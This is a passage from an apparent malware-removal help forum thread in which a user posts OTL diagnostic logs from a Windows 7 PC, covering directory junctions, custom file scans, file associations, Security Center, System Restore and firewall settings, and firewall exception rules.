03/30/2010  19:19    <JUNCTION>     Cookies [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Cookies]
03/30/2010  19:19    <JUNCTION>     Local Settings [C:\Users\Nick\AppData\Local]
03/30/2010  19:19    <JUNCTION>     My Documents [C:\Users\Nick\Documents]
03/30/2010  19:19    <JUNCTION>     NetHood [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
03/30/2010  19:19    <JUNCTION>     PrintHood [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
03/30/2010  19:19    <JUNCTION>     Recent [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Recent]
03/30/2010  19:19    <JUNCTION>     SendTo [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\SendTo]
03/30/2010  19:19    <JUNCTION>     Start Menu [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Start Menu]
03/30/2010  19:19    <JUNCTION>     Templates [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Users\Nick\AppData\Local
03/30/2010  19:19    <JUNCTION>     Application Data [C:\Users\Nick\AppData\Local]
03/30/2010  19:19    <JUNCTION>     History [C:\Users\Nick\AppData\Local\Microsoft\Windows\History]
03/30/2010  19:19    <JUNCTION>     Temporary Internet Files [C:\Users\Nick\AppData\Local\Microsoft\Windows\Temporary Internet Files]
               0 File(s)              0 bytes
 Directory of C:\Users\Nick\Documents
03/30/2010  19:19    <JUNCTION>     My Music [C:\Users\Nick\Music]
03/30/2010  19:19    <JUNCTION>     My Pictures [C:\Users\Nick\Pictures]
03/30/2010  19:19    <JUNCTION>     My Videos [C:\Users\Nick\Videos]
               0 File(s)              0 bytes
 Directory of C:\Users\Owner
03/29/2010  18:48    <JUNCTION>     Application Data [C:\Users\Owner\AppData\Roaming]
03/29/2010  18:48    <JUNCTION>     Cookies [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Cookies]
03/29/2010  18:48    <JUNCTION>     Local Settings [C:\Users\Owner\AppData\Local]
03/29/2010  18:48    <JUNCTION>     My Documents [C:\Users\Owner\Documents]
03/29/2010  18:48    <JUNCTION>     NetHood [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
03/29/2010  18:48    <JUNCTION>     PrintHood [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
03/29/2010  18:48    <JUNCTION>     Recent [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Recent]
03/29/2010  18:48    <JUNCTION>     SendTo [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\SendTo]
03/29/2010  18:48    <JUNCTION>     Start Menu [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu]
03/29/2010  18:48    <JUNCTION>     Templates [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Users\Owner\AppData\Local
03/29/2010  18:48    <JUNCTION>     Application Data [C:\Users\Owner\AppData\Local]
03/29/2010  18:48    <JUNCTION>     History [C:\Users\Owner\AppData\Local\Microsoft\Windows\History]
03/29/2010  18:48    <JUNCTION>     Temporary Internet Files [C:\Users\Owner\AppData\Local\Microsoft\Windows\Temporary Internet Files]
               0 File(s)              0 bytes
 Directory of C:\Users\Owner\Documents
03/29/2010  18:48    <JUNCTION>     My Music [C:\Users\Owner\Music]
03/29/2010  18:48    <JUNCTION>     My Pictures [C:\Users\Owner\Pictures]
03/29/2010  18:48    <JUNCTION>     My Videos [C:\Users\Owner\Videos]
               0 File(s)              0 bytes
 Directory of C:\Users\Public\Documents
07/14/2009  00:08    <JUNCTION>     My Music [C:\Users\Public\Music]
07/14/2009  00:08    <JUNCTION>     My Pictures [C:\Users\Public\Pictures]
07/14/2009  00:08    <JUNCTION>     My Videos [C:\Users\Public\Videos]
               0 File(s)              0 bytes
 Directory of C:\Windows\System32\config\systemprofile
04/03/2010  23:53    <JUNCTION>     Application Data [C:\Windows\system32\config\systemprofile\AppData\Roaming]
04/03/2010  23:53    <JUNCTION>     Local Settings [C:\Windows\system32\config\systemprofile\AppData\Local]
01/03/2012  02:48    <JUNCTION>     My Documents [C:\Windows\system32\config\systemprofile\Documents]
01/03/2012  02:48    <JUNCTION>     NetHood [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
01/03/2012  02:48    <JUNCTION>     PrintHood [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
01/03/2012  02:48    <JUNCTION>     Recent [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Recent]
01/03/2012  02:48    <JUNCTION>     SendTo [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\SendTo]
10/02/2010  12:06    <JUNCTION>     Start Menu [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu]
01/03/2012  02:48    <JUNCTION>     Templates [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Windows\System32\config\systemprofile\AppData\Local
04/03/2010  23:53    <JUNCTION>     Application Data [C:\Windows\system32\config\systemprofile\AppData\Local]
04/03/2010  23:53    <JUNCTION>     History [C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\History]
04/03/2010  23:53    <JUNCTION>     Temporary Internet Files [C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files]
               0 File(s)              0 bytes
 Directory of C:\Windows\System32\config\systemprofile\Documents
01/03/2012  02:48    <JUNCTION>     My Music [C:\Windows\system32\config\systemprofile\Music]
01/03/2012  02:48    <JUNCTION>     My Pictures [C:\Windows\system32\config\systemprofile\Pictures]
01/03/2012  02:48    <JUNCTION>     My Videos [C:\Windows\system32\config\systemprofile\Videos]
               0 File(s)              0 bytes
 Directory of C:\Windows\SysWOW64\config\systemprofile
04/03/2010  23:53    <JUNCTION>     Application Data [C:\Windows\system32\config\systemprofile\AppData\Roaming]
04/03/2010  23:53    <JUNCTION>     Local Settings [C:\Windows\system32\config\systemprofile\AppData\Local]
01/03/2012  02:48    <JUNCTION>     My Documents [C:\Windows\system32\config\systemprofile\Documents]
01/03/2012  02:48    <JUNCTION>     NetHood [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
01/03/2012  02:48    <JUNCTION>     PrintHood [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
01/03/2012  02:48    <JUNCTION>     Recent [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Recent]
01/03/2012  02:48    <JUNCTION>     SendTo [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\SendTo]
10/02/2010  12:06    <JUNCTION>     Start Menu [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu]
01/03/2012  02:48    <JUNCTION>     Templates [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Windows\SysWOW64\config\systemprofile\AppData\Local
04/03/2010  23:53    <JUNCTION>     Application Data [C:\Windows\system32\config\systemprofile\AppData\Local]
04/03/2010  23:53    <JUNCTION>     History [C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\History]
04/03/2010  23:53    <JUNCTION>     Temporary Internet Files [C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files]
               0 File(s)              0 bytes
 Directory of C:\Windows\SysWOW64\config\systemprofile\Documents
01/03/2012  02:48    <JUNCTION>     My Music [C:\Windows\system32\config\systemprofile\Music]
01/03/2012  02:48    <JUNCTION>     My Pictures [C:\Windows\system32\config\systemprofile\Pictures]
01/03/2012  02:48    <JUNCTION>     My Videos [C:\Windows\system32\config\systemprofile\Videos]
               0 File(s)              0 bytes
     Total Files Listed:
               0 File(s)              0 bytes
             143 Dir(s)  143,534,940,160 bytes free
 
< %systemroot%\System32\config\*.sav >
 
< %PROGRAMFILES%\bak. /s >
[2014/05/29 10:24:37 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Anvisoft\Cloud System Booster\bak
 
< %systemroot%\system32\bak. /s >
 
< %ALLUSERSPROFILE%\Start Menu\*.lnk /x >
 
< %systemroot%\system32\config\systemprofile\*.dat /x >
 
< %systemroot%\*.config >
 
< %systemroot%\system32\*.db >
 
< %PROGRAMFILES%\Internet Explorer\*.dat >
 
< %APPDATA%\Microsoft\Internet Explorer\Quick Launch\*.lnk /x >
[2010/03/29 18:03:14 | 000,000,221 | -HS- | M] () -- C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop (1).ini
[2011/09/14 08:47:43 | 000,000,304 | -HS- | M] () -- C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
 
< %USERPROFILE%\Desktop\*.exe >
[2012/05/24 20:07:55 | 1607,031,952 | ---- | M] (Nexon) -- C:\Users\Owner\Desktop\Combatarms_VER_US_2.1205.04.exe
[2014/05/30 23:07:14 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Owner\Desktop\OTL.exe
[2012/12/17 19:42:33 | 014,784,712 | ---- | M] () -- C:\Users\Owner\Desktop\SolveigMM_HyperCam_3_4_1205_23.exe
[2012/09/07 16:13:34 | 025,685,128 | ---- | M] (Microsoft Corporation) -- C:\Users\Owner\Desktop\wordview_en-us.exe
 
< %PROGRAMFILES%\Common Files\*.* >
 
< %systemroot%\*.src >
 
< %systemroot%\install\*.* >
 
< %systemroot%\system32\DLL\*.* >
 
< %systemroot%\system32\HelpFiles\*.* >
 
< %systemroot%\system32\rundll\*.* >
 
< %systemroot%\winn32\*.* >
 
< %systemroot%\Java\*.* >
 
< %systemroot%\system32\test\*.* >
 
< %systemroot%\system32\Rundll32\*.* >
 
< %systemroot%\AppPatch\Custom\*.* >
 
< HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU >
 
< HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\Results\Install|LastSuccessTime /rs >
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 94 bytes -> C:\ProgramData\Temp:C5E4F943
@Alternate Data Stream - 138 bytes -> C:\ProgramData\Temp:55422315
@Alternate Data Stream - 138 bytes -> C:\ProgramData\Temp:2F4A0A6B
@Alternate Data Stream - 136 bytes -> C:\ProgramData\Temp:C46995DA
@Alternate Data Stream - 133 bytes -> C:\ProgramData\Temp:FF9C44FE
@Alternate Data Stream - 132 bytes -> C:\ProgramData\Temp:B683AD23
@Alternate Data Stream - 130 bytes -> C:\ProgramData\Temp:A59DD4AD
@Alternate Data Stream - 122 bytes -> C:\ProgramData\Temp:E0135E7C
@Alternate Data Stream - 118 bytes -> C:\ProgramData\Temp:373E1720
@Alternate Data Stream - 107 bytes -> C:\ProgramData\Temp:A3E39C6A
@Alternate Data Stream - 106 bytes -> C:\ProgramData\Temp:2EF63291
 
< End of report >
 

Edited by NikJ92, 31 May 2014 - 05:56 AM.

    Advertisements

Register to Remove


#2 NikJ92

NikJ92

    Authentic Member

  • Authentic Member
  • PipPip
  • 69 posts

Posted 31 May 2014 - 12:12 AM

== EXTRAS.txt == 

 

OTL Extras logfile created on: 5/30/2014 11:12:02 - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Owner\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17041)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
7.99 Gb Total Physical Memory | 7.18 Gb Available Physical Memory | 89.90% Memory free
15.98 Gb Paging File | 15.19 Gb Available in Paging File | 95.05% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 917.83 Gb Total Space | 133.70 Gb Free Space | 14.57% Space Free | Partition Type: NTFS
Drive D: | 13.68 Gb Total Space | 1.92 Gb Free Space | 14.07% Space Free | Partition Type: NTFS
Drive K: | 1.86 Gb Total Space | 0.01 Gb Free Space | 0.32% Space Free | Partition Type: FAT32
 
Computer Name: OWNER-PC | User Name: Owner | Logged in as Administrator.
Boot Mode: SafeMode | Scan Mode: Current user | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl[@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)
.url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)
 
[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
.cmd [@ = cmdfile] -- Reg Error: Key error. File not found
.hta [@ = htafile] -- Reg Error: Key error. File not found
.html [@ = FirefoxHTML] -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
.ini [@ = inifile] -- Reg Error: Key error. File not found
.reg [@ = regfile] -- Reg Error: Key error. File not found
.vbs [@ = VBSFile] -- Reg Error: Key error. File not found
.wsf [@ = wsffile] -- Reg Error: Key error. File not found
 
========== Shell Spawning ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\SysWow64\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htafile [open] -- "%1" %*
inffile [install] -- %SystemRoot%\System32\rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %1 (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- C:\Program Files (x86)\File Type Helper\FileTypeHelper.exe "%1" (Microsoft)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [Winamp.Bookmark] -- "C:\Program Files (x86)\Winamp\winamp.exe" /BOOKMARK "%1" (Nullsoft, Inc.)
Directory [Winamp.Enqueue] -- "C:\Program Files (x86)\Winamp\winamp.exe" /ADD "%1" (Nullsoft, Inc.)
Directory [Winamp.Play] -- "C:\Program Files (x86)\Winamp\winamp.exe" "%1" (Nullsoft, Inc.)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\SysWow64\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htafile [open] -- "%1" %*
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- C:\Program Files (x86)\File Type Helper\FileTypeHelper.exe "%1" (Microsoft)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [Winamp.Bookmark] -- "C:\Program Files (x86)\Winamp\winamp.exe" /BOOKMARK "%1" (Nullsoft, Inc.)
Directory [Winamp.Enqueue] -- "C:\Program Files (x86)\Winamp\winamp.exe" /ADD "%1" (Nullsoft, Inc.)
Directory [Winamp.Play] -- "C:\Program Files (x86)\Winamp\winamp.exe" "%1" (Nullsoft, Inc.)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.
 
========== Security Center Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 0
"FirewallDisableNotify" = 0
"AntiVirusDisableNotify" = 0
"UpdatesDisableNotify" = 0
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = 28 4D B2 76 41 04 CA 01  [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = 0
"AntiVirusDisableNotify" = 0
"UpdatesDisableNotify" = 0
"AntiVirusOverride" = 0
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
 
========== System Restore Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = 1
 
========== Firewall Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
========== Authorized Applications List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
"C:\Nexon\Combat Arms\CombatArms.exe" = C:\Nexon\Combat Arms\CombatArms.exe:*Enabled:CombatArms.exe -- (Nexon)
"C:\Nexon\Combat Arms\Engine.exe" = C:\Nexon\Combat Arms\Engine.exe:*Enabled:Engine.exe -- (Nexon)
"C:\Nexon\Combat Arms\CombatArms.exe" = C:\Nexon\Combat Arms\CombatArms.exe:*Enabled:CombatArms.exe -- (Nexon)
"C:\Nexon\Combat Arms\Engine.exe" = C:\Nexon\Combat Arms\Engine.exe:*Enabled:Engine.exe -- (Nexon)
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\Nexon\Combat Arms\CombatArms.exe" = C:\Nexon\Combat Arms\CombatArms.exe:*Enabled:CombatArms.exe -- (Nexon)
"C:\Nexon\Combat Arms\Engine.exe" = C:\Nexon\Combat Arms\Engine.exe:*Enabled:Engine.exe -- (Nexon)
"C:\Nexon\Combat Arms\CombatArms.exe" = C:\Nexon\Combat Arms\CombatArms.exe:*Enabled:CombatArms.exe -- (Nexon)
"C:\Nexon\Combat Arms\Engine.exe" = C:\Nexon\Combat Arms\Engine.exe:*Enabled:Engine.exe -- (Nexon)
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0EE51BD2-AABE-43BA-A873-B3B8A88AFCED}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{123B2641-5E51-4E1A-90C8-D6406BCD367C}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 | 
"{23B8D8C1-697B-4BA9-AD9A-A256D3F42652}" = lport=7777 | protocol=17 | dir=in | app=%systemroot%\ehome\ehshell.exe | 
"{2ACBBEAC-4E80-4F2C-AA26-1A7A9BDDD9CB}" = lport=2869 | protocol=6 | dir=in | app=system | 
"{2CAC853D-6191-4A72-A3A0-ABD90E0FC209}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{36513271-D8EB-4FF6-85EA-4E1D1303089D}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=svchost.exe | 
"{3CDE4D42-10C1-46C7-B509-8CF52E55C1A0}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{3F2429E3-CC2D-4D2D-82B0-077601BCD4C6}" = lport=2869 | protocol=6 | dir=in | app=system | 
"{41A6900D-D752-4409-A7C9-653EF7CC2F3F}" = lport=50061 | protocol=6 | dir=in | name=akamai netsession interface | 
"{449F0B6E-40B3-40E2-A702-0103C1F72E91}" = lport=3307 | protocol=6 | dir=in | name=port 3307 | 
"{48874E8F-20D8-4D00-96CE-B8BE80AB9730}" = rport=445 | protocol=6 | dir=out | app=system | 
"{49B83EDC-B9D6-49FE-97C3-3DD99801493B}" = lport=554 | protocol=6 | dir=in | app=%systemroot%\ehome\ehshell.exe | 
"{503F9622-303A-4D33-96F9-CDB9FFFF7EDC}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{50B18952-ECF2-4D38-B233-8BC133F1C03F}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{5B898FE9-437A-4802-9DFE-C7F3D0805A05}" = lport=3390 | protocol=6 | dir=in | app=system | 
"{5CABC439-E266-4073-A0C8-A90CDD3499F1}" = lport=5000 | protocol=17 | dir=in | name=akamai netsession interface | 
"{5E595E8F-40FD-490D-8E2F-C4373AACC5AC}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{87EF61F3-F88A-4C59-9BFC-4A8D2CA63596}" = lport=3390 | protocol=6 | dir=in | app=system | 
"{8B0C937F-0CC8-4FA0-805F-3EB5B6EB6803}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{917A400F-3AFA-48BF-B575-901F813A9575}" = lport=51001 | protocol=6 | dir=in | name=adobe version cue cs4 server | 
"{98B7AE32-8C03-47A8-A7E0-7A63457F2819}" = lport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{99D51067-91E8-4918-952E-D43D261F923F}" = lport=3704 | protocol=6 | dir=in | name=adobe version cue cs4 server | 
"{9C389097-D5B7-47E2-A0E2-5B070681E1D2}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe | 
"{A574EE21-7424-4942-8C66-0BCF141D5E30}" = rport=137 | protocol=17 | dir=out | app=system | 
"{AAEDFADE-BFFF-423F-91EC-9DB957EA0F1F}" = lport=1900 | protocol=17 | dir=in | name=windows live communications platform (ssdp) | 
"{AD046985-4B39-4428-9C92-0F3A73C2F6AB}" = lport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{B72699C5-D741-4298-8F0D-648E5680E7DA}" = lport=138 | protocol=17 | dir=in | app=system | 
"{B81FDD9C-8A32-4571-8F0A-53D42DF132DD}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{B84A14F8-2109-4BB7-9AA3-C24E3AF95A14}" = rport=138 | protocol=17 | dir=out | app=system | 
"{BCFE43E8-4F2E-4FB8-8EDE-AA968E9CB206}" = lport=445 | protocol=6 | dir=in | app=system | 
"{BF7A5814-F9C2-4AF5-A91A-1471D603E0E9}" = lport=10244 | protocol=6 | dir=in | app=system | 
"{C380EAF7-2D04-444C-B0B1-7A4204DF0283}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{C4B1775C-D2E7-46E5-BD9B-B35D611EB6BA}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{D099D89D-4F43-4C5C-A704-FB1B4BE20A9A}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{D2F613D7-DD8B-4BD0-82AD-B9FF4C56A245}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe | 
"{D6A23678-9A95-4FD5-A564-69732C2BB4C7}" = lport=7777 | protocol=17 | dir=in | app=%systemroot%\ehome\ehshell.exe | 
"{D80FFC5F-8CD4-4337-9AFD-044353C9B518}" = lport=10244 | protocol=6 | dir=in | app=system | 
"{DD6C44F9-CF86-493F-943C-47D18A59E610}" = lport=139 | protocol=6 | dir=in | app=system | 
"{DE8585FC-CAAE-407C-AF97-969466DCA3AF}" = lport=51000 | protocol=6 | dir=in | name=adobe version cue cs4 server | 
"{E0C90CE9-2697-4B97-ABBA-7423D6F4ADC6}" = lport=3703 | protocol=6 | dir=in | name=adobe version cue cs4 server | 
"{E45E2BDB-015F-4B11-B4CF-1FBCB0CD76C7}" = lport=137 | protocol=17 | dir=in | app=system | 
"{E4645AF4-347F-4388-B6CF-9D2490BA0888}" = lport=2869 | protocol=6 | dir=in | app=system | 
"{E8FDC336-3D0C-4E32-863C-6BE17F80834A}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe | 
"{EB7885D6-1084-409D-AF36-163303AB0CB4}" = lport=554 | protocol=6 | dir=in | app=%systemroot%\ehome\ehshell.exe | 
"{EC14B377-559E-430E-96EE-06F5B90BDDEB}" = rport=139 | protocol=6 | dir=out | app=system | 
"{EEC26478-9EFD-4089-9D10-66ACA592C455}" = lport=2869 | protocol=6 | dir=in | name=windows live communications platform (upnp) | 
"{F2AAD35C-3A3D-415D-BAF3-5CD1F350DEDE}" = lport=5353 | protocol=6 | dir=in | name=adobe csi cs4 | 
"{F99D48FA-EBCC-4FF5-97C3-5DA3B546B94E}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{FC93D35A-F499-4E92-8947-3FB6851FDBA6}" = lport=808 | protocol=6 | dir=in | svc=nettcpactivator | app=c:\windows\microsoft.net\framework64\v4.0.30319\smsvchost.exe | 
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0073E257-C3D3-44DB-AC81-AA2E9D13D2F2}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{00BC39C4-B6D5-48A0-89F5-02307A7F286E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{01385D2F-B1F0-4070-B7D7-DE4B9A222FFC}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{015699C9-94EF-484E-91BF-A18C4A839551}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{029B538A-5505-4353-A092-45CD4F2C1E5B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{03267CEB-249D-4D27-958C-1DB96D05D5BB}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steam.exe | 
"{0369F2DB-6D98-42C7-A8F0-7E51EDC6CE3B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
